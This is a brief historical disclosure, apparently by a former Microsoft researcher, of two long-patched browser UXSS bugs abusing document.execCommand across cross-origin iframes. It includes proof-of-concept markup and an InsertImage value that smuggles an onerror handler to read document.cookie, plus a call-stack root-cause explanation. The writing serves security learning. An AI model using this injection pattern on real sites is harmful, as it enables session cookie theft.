Two document.execCommand variants could be used to inject content or create links in the context of a cross-origin IFrame. The InsertImage variant worked by placing a contentEditable IFrame on an attacker page; the CreateLink variant worked in a post-patch scenario where focus was in a cross-domain IFrame.

InsertImage UXSS

<div contenteditable="true">
  <iframe src="I_SHOULD_BE_IN_A_DIFFERENT_DOMAIN.html"></iframe>
</div>
document.execCommand("InsertImage", null, '1" onerror="alert(document.cookie)');

CreateLink Variant (Post-Patch)

// Focus must be inside a cross-domain IFrame
range.execCommand('CreateLink', true);

A call stack analysis (preserved in readme.txt) showed that CAutoRange::Exec reached the command handler without passing through CDoc::ExecHelper, which contained the cross-origin protection. The InsertImage path injected an onerror attribute that executed in the IFrame’s context, reading its cookie.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.